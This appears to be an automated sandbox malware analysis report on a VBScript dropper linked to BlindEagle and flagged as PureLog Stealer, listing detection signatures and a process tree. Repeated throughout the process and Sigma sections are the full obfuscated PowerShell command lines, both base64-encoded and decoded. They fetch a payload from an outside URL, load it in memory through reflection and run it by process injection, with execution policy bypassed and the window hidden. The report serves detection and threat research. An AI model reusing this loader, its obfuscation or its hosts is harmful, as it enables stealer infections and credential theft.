
Windows Analysis Report
kz1fEn2R9Z.vbs

Overview

General Information

Sample name: kz1fEn2R9Z.vbs (renamed because the original name is a hash value)
Original sample name: 80e7c85eeb0a57e9f50e7d84e0eb1b2f2230837b53080d24696fab7373e9bc03.vbs
Analysis ID: 1523834
MD5: 10a145cb87654a33c6c0beda947466b8
SHA1: a504192f1b5ac44e6e49b4bc9ef660220c604469
SHA256: 80e7c85eeb0a57e9f50e7d84e0eb1b2f2230837b53080d24696fab7373e9bc03
Tags: BlindEagle, vbs, user-JAMESWT_MHT

Detection

PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7548 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.1788155155.000001A636EF0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000003.00000002.1770505012.000001A62EDFE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Process Memory Space: powershell.exe PID: 7600 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (string match offsets omitted)
Process Memory Space: powershell.exe PID: 7768 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (string match offsets omitted)
Source | Rule | Description | Author | Strings
3.2.powershell.exe.1a62f612b80.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
3.2.powershell.exe.1a636ef0000.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
3.2.powershell.exe.1a636ef0000.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
3.2.powershell.exe.1a62f612b80.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

              System Summary

              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle
              Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . 
( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . 
( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . 
( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs", ProcessId: 7548, ProcessName: wscript.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs", ProcessId: 7548, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . 
